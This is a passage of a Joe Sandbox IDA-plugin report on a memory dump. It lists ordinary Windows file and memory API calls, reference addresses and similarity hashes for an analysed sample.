                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
• Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
• Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
• Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
• Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
Memory Dump Source
• Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D